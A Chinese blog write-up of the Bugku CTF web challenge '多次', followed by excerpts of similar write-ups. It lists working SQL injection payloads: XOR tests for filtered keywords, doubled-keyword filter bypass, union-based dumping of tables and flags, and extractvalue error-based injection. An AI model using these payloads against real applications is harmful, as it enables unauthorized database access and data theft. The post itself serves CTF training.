Bugku web——多次

最新推荐文章于 2020-09-06 20:50:58 发布
最新推荐文章于 2020-09-06 20:50:58 发布
阅读量308 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: ctf总结
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_40481505/article/details/102575194

打开链接

在这里插入图片描述
首先对id尝试注入单引号和双引号,发现都报错
继续测试,发现下面结果:

?id=1' --+ (显示成功)
?id=1" --+ (显示成功)
?id=1' and 1=1 --+ (显示报错)
?id=1" and 1=1 --+  (显示成功)

猜测sql语句使用的是单引号,且对and继续过滤
使用下面代码验证

?id=1'^(length('and')!=0)^'  (显示成功)

^是求异或符,计算得length('and')!=0为0,说明and确实被过滤
尝试双写绕过

?id=1' anandd 1=1 --+ (显示成功)

说明双写能成功绕过
下面使用union联合注入

?id=-1' ununionion seselectlect 1,2--+ (确定回显位置)

?id=-1' ununionion seselectlect 1, database() --+
 
?id=-1' ununionion sselectelect 1,group_concat(table_name) from infoorrmation_schema.tables where tabel_schema=database()--+

?id=-1' ununionion seselectlect 1,group_concat(column_name) from infoorrmation_schema.columns where table_name='flag1'--+
 
?id=-1' ununionion sselectelect 1,group_concat(flag1,':',address) from flag1--+

得到下一关地址/once_more.php
在这里插入图片描述打开链接
在这里插入图片描述
对id尝试单引号注入,发现开启了报错回显,且sql语句使用单引号
因此使用报错注入

?id=1' and extractvalue(1,concat('~',(select database()))) %23

?id=1' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables from table_schema=database()))) %23

?id=1' and extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='flag2'))) %23 

?id=1' and extractvalue(1,concat('~',(select group_concat(flag2) from flag2))) %23

得到flag
在这里插入图片描述
此题还可使用Bool,Timing,和sqlmap

Bugku Web CTF-多次
No Title
12-28 278
Bugku Web CTF-多次 看url构造,可控的值为id: http://123.206.87.240:9004/1ndex.php?id=5 尝试不同数字一直到id=5会提示可以在该页面进行SQL注入。 尝试不同的构造: http://123.206.87.240:9004/1ndex.php?id=5' 提示Error,Error,Error!,但双引号不报错: http://123...
BugkuCTF——最新web篇writeup(持续更新)
1匹黑马
11-16 4265
文章目录web2计算器web基础$_GETweb基础$_POST矛盾web3域名解析你必须让他停下变量1 web2 打开页面后F12查看源代码即可。 flag:KEY{Web-2-bugKssNNikls9100} 计算器 这里做了输入长度限制,F12选中输入框,修改长度限制即可。 flag:flag{CTF-bugku-0032} web基础$_GET 这里要理解超全局变量$_GET,只要我们传递的参数为what,并且内容为flag,即可输出flag。 flag:flag{bugku_get_su8
bugku web 多次
realstarstarli的博客
09-06 397
多次 在本题中采用一般的sql注入语法好像无法实现sql注入,进而能够解决该题所以猜测是因为字段被过滤了 异或为逻辑运算,当两个条件相同(同真或同假)时为假,当两个条件不同时为真。 在mysql中异或用^或xor来表示。 当url为http://123.206.87.240:9004/1ndex.php?id=1’^(length(‘and’)!=0)%23 若and的长度为0(即为被过滤),则^(length(‘and’)!=0)为假,表达式就为id=1异或0=1,页面正常 若and的长度为不为0(即
bugku_web_多次
weixin_30642305的博客
10-02 213
这道题好难啊、、、多谢大佬的wp 整个页面没有任何可以入手的地方,再看URL:http://120.24.86.145:9004/1ndex.php?id=1 太明显的SQL注入了,然后给id多赋值几次,会发现作者又在各种忽悠我们,不过等到id=5的时候他告诉我们"You can do some SQL injection in here." 然后开始各种注入测试啊:   1、加...
BugkuCTF之web题之多次
A_dmin的博客
12-10 7702
BugkuCTF之web题之多次
Bugkuweb题目(多次)的解题
weixin_30556959的博客
03-07 145
这道题目我弄了好久,最后问了朋友,然后在朋友的帮助下,将flag找到了 这里写一下解题方法,记录一下 一进到这道题,看到了php?id=1,就很熟悉,很有可能是一道sql注入的题目,肯定是要试一下最简单的测试,(哪怕知道不可能是什么都没有过滤) 单引号出错 多加一个%23,发现不出错了 加上’ and 1=1%23 又出错了,可能是过滤了,但是不知道过滤了什么 这里有一个很好的方法知道过滤...
BugkuCTF练习题解——Web
qq_41739275的博客
08-24 7035
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
BugkuCTF web 输入密码查看flag——never give up
the_world_go的博客
04-06 1076
输入密码查看flag 看到要输入密码(爆破爆破爆破)。 打开bp抓包。爆破(果然弱密码) 输入密码得到 flag{bugku-baopo-hah} 点击一百万次好像网页崩了(也有可能我太菜了),进不去。。。 备份是个好习惯 打开网页,一段乱码。好的我看不懂,看源码没线索,抓包,没发现 拿御剑扫下后台吧 找到了 可以看到我要提交key1和key2,他们不相等但是md5处理以后相等 参考php漏洞...
Bugkuweb题解
Lemon's blog
08-21 2726
前言:最近做了一些Bugku入门的web题目,感觉web题挺有趣的,并非是得出flag,而是可以通过一个题目学习到很多知识。 域名解析 题目说把 flag.baidu.com 解析到123.206.87.240 就能拿到flag,如果了解域名解析的原理和系统文件host的作用,那这道题就很简单了。 通俗的话说:域名是为了我们方便记忆,但计算机识别的是IP地址,所以要将域名解析为IP地址才能访问到自...
bugku web/crypto 系列题目思路总结(三)
yukinorong的博客
08-07 702
bugku 告诉你一个秘密 参考博文:https://www.jianshu.com/p/3cacf1dd479c 需要了解base64编码特征才能想到。 利用键盘位置做密码很巧妙。 bugku 这不是md5 确实不是md5,十六进制字符串直接转字符即可。 bugku 贝斯家族 base编码系列除了64之外还有16 32 36 58 62 91等。后面的数字为用于编码的种类,数字越大,一般来讲编码...
Bugku 多次
Superpig的博客
11-19 482
步骤 1、打开题目链接,发现url传入了参数id=1,当改参数为id=1’ 时显示有错误,改为id=1"时没有错误,因此,判断是错误注入 2、首先判断什么情况下会报错,方法:异或注入 id=1’^(0)%23 时,正常运行(%23是#的url编码) id=1’^(1)%23 时,报错 因此,判断出,当括号里的表达式为真时报错 3、判断过滤了哪些字符 id=1’(length(‘union’)...
BugKu-多次
苟有恒,必有三更眠,五更起。
08-06 708
多次 原题链接 http://120.24.86.145:9004 分析 单引号出错 加上%23,发现不出错了 加上' and 1=1%23 又出错了,应该是过滤了 这里学习到一个新知识,如何判断过滤了哪些字符? 采用异或注入。 在id=1后面输入 '(0)' 发现不出错,那就将0换成1=1 如果出错,那就是成功了 如果括号里面的判断是假的,那么...
BUGKU 多次 手动注入+脚本盲注
weixin_30872157的博客
09-08 223
本文内容为SQL手动注入步骤+想法,以及盲注脚本。 http://123.206.87.240:9004/1ndex.php?id=1 http://123.206.87.240:9004/1ndex.php?id=1'报错 http://123.206.87.240:9004/1ndex.php?id=1'--+正常 存在注入 http://123.206.87...
bugku-Web-多次(异或注入,判断被过滤的关键字)
weixin_30588907的博客
12-13 356
进去看到url感觉是sql注入, 加上',报错但是%23不报错,加上'--+,也不报错,说明可以用--+注释 加上' or 1=1--+,报错 尝试' oorr 1=1--+,正常 说明or被过滤了. 那么怎么判断哪些关键字被过滤了呢,这里用到异或注入(同真异假)。 http://120.24.86.145:9004/1ndex.php?id=1'^(len...
bugku_多次------WP
xiaoduanDDG的博客
04-01 311
参考博主:https://blog.youkuaiyun.com/qq_26090065/article/details/82708691 部分摘取自:https://space.bilibili.com/18638672?spm_id_from=333.788.b_765f7570696e666f.1 首先恶补知识点: (1) group_concat函数返回一个字符串的结果,该结果由分组中的值连接而成,就...
bugku-多次 (详细)
偷一个月亮
06-20 1904
第一个考点:异或注入判断过滤关键字 ?id=1’^(length(‘union’)!=0)–+ 过滤的用双写绕过 GET /1ndex.php?id=-1' ununionion selselectect 2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=0x7765623130...
bugku-Web-多次(异或注入,判断被过滤的关键字)☆
Sea_Sand息禅
12-13 1021
进去看到url感觉是sql注入, 加上',报错但是%23不报错,加上'--+,也不报错,说明可以用--+注释 加上' or 1=1--+,报错 尝试' oorr 1=1--+,正常 说明or被过滤了. 那么怎么判断哪些关键字被过滤了呢,这里用到异或注入(同真异假)。 http://120.24.86.145:9004/1ndex.php?id=1'^(length('union')!=0...
bugku中的多次题目以及学到的异或注入
mylyylmy的博客
08-01 3301
首先我们判断一下是什么注入类型 注意输入的是英文字符',中文不会转变为%27,报错,说明是字符注入 这时候我们就要判断一下SQL网站过滤了什么内容,我们可以使用异或注入来判断哪些字符串被过滤掉了 http://120.24.86.145:9004/1ndex.php?id=1%27^(0)%23 正常运行,我们在输入 http://120.24.86.145:9004/1nde...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值